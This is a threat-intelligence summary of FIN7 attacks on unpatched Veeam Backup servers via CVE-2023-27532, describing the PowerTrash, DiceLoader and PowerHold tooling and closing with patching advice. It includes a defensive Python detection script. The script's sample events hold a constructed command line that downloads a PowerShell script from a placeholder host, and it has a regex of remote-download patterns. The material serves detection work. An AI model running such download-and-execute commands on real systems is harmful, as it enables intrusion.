Hackers Target Vulnerable Veeam Backup Servers Exposed Online

Cyber Security Threat Summary:
According to researchers at WithSecure, a Finnish cybersecurity and privacy company, threat actors have been leveraging a recently fixed vulnerability in Veeam Backup and Replication software to target unpatched Veeam backup servers. The vulnerability in question is being tracked as CVE-2023-27532 and allows unauthenticated users in the backup infrastructure to obtain encrypted credentials stored in the VeeamVBR configuration database.

WithSecure stated in a recent report that they observed the attacks in late March. Based on the tactics, techniques, and procedures observed, researchers attributed the attacks to FIN7, a financially motivated cybercriminal group that is known for partnering up with various ransomware groups including Conti, REvil, Maze, Egregor, and BlackBasta.

In the latest campaign, researchers believe FIN7 actors likely exploited the vulnerability to gain initial access and execute malicious code. Using telemetry data from WithSecure’s Endpoint Detection and Response, they noticed that some Veeam servers generated suspicious alerts (e.g. sqlservr[.]exe spawning cmd[.]exe and downloading PowerShell scripts).
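
The alert pattern described above (the SQL Server process behind the Veeam configuration database spawning a shell that pulls down a script) can be expressed as a simple process-creation detection. The following is an added example, not WithSecure's or Veeam's code; it assumes Sysmon Event ID 1 style field names (Computer, ParentImage, Image, CommandLine), and all sample events are constructed.

```python
# Added example; Sysmon EID 1 field names (Computer, ParentImage, Image, CommandLine) assumed.
import re
from typing import Dict, Iterable, List, Optional

SUSPICIOUS_PARENT = "sqlservr.exe"                  # SQL Server hosting the VBR config DB
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line hints that the spawned shell is fetching remote content.
DOWNLOAD_HINTS = re.compile(r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b",
                            re.IGNORECASE)

def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a severity for a process-creation event, or None if it does not match."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent != SUSPICIOUS_PARENT or child not in SHELL_CHILDREN:
        return None
    if DOWNLOAD_HINTS.search(event.get("CommandLine", "")):
        return "high"     # shell spawned by SQL Server and pulling remote content
    return "medium"       # shell spawned by SQL Server; investigate regardless

def scan(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over a stream of events and collect the alerts."""
    alerts = []
    for ev in events:
        severity = classify(ev)
        if severity:
            alerts.append({"severity": severity, "host": ev.get("Computer", "?"),
                           "child": basename(ev.get("Image", "")),
                           "cmdline": ev.get("CommandLine", "")})
    return alerts

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"  # constructed path
SAMPLE_EVENTS = [  # constructed sample events, not real telemetry
    {"Computer": "VEEAM01", "ParentImage": SQLSERVR, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -c Invoke-WebRequest http://example.invalid/host_ip.ps1"},
    {"Computer": "VEEAM01", "ParentImage": SQLSERVR, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Computer": "VEEAM01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

On a Veeam backup server the SQL Server process has no legitimate reason to launch cmd.exe or PowerShell, so even the "medium" case deserves a look.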

“A closer look showed that the threat actor initially executed the PowerTrash PowerShell script, seen in past attacks attributed to FIN7, that included a payload - the DiceLoader/Lizar backdoor, to be executed on the compromised machine. DiceLoader, also tracked as Tirion, has also been linked to FIN7 malicious activity in the past. It is worth noting that more recent incidents attributed to this gang made use of a different backdoor that Mandiant researchers call PowerPlant. Neeraj Singh, a senior researcher at WithSecure, told BleepingComputer that DiceLoader and PowerTrash were not the only connections to FIN7 activity. A PowerShell script (host_ip[.]ps1) for resolving IP addresses to hostnames and a custom one used for reconnaissance in the lateral movement stage of the attack are also known to be part of FIN7's toolkit. Once they got access to the host, the hackers used their malware, various commands, and custom scripts to collect system and network information, as well as credentials from the Veeam backup database. Persistence for DiceLoader was achieved through a custom PowerShell script called PowerHold, the researchers at WithSecure say, adding that the threat actor also attempted lateral movement using stolen credentials, testing their access with WMI invocations and ‘net share’ commands” (Bleeping Computer, 2023).

Security Officer Comments:
Thankfully, the attacks were interrupted before the actors got a chance to execute the final payload. As such, the motive behind the latest attacks is unclear. However, WithSecure stated that the intrusions could have led to the deployment of ransomware if the attack chain had been successfully completed.

The development comes after Horizon3 released an exploit for CVE-2023-27532 on March 23. The pentesting company demonstrated how an insecure API endpoint could be leveraged to extract credentials in plain text. Furthermore, the company also noted that a threat actor could exploit the flaw to remotely run code with the highest privileges.

Suggested Corrections:
Last month, Huntress Labs warned that there were approximately 7,500 internet-exposed VBR hosts that appeared to be vulnerable. While the number of vulnerable instances has likely decreased, there are still several unpatched servers which are susceptible to attacks.

WithSecure recommends organizations that use Veeam Backup and Replication to patch their backup servers and look for signs of compromise on their network using the information provided in its advisory.

IOCs:
https://github.com/WithSecureLabs/iocs/tree/master/FIN7VEEAM

Link:
https://www.bleepingcomputer.com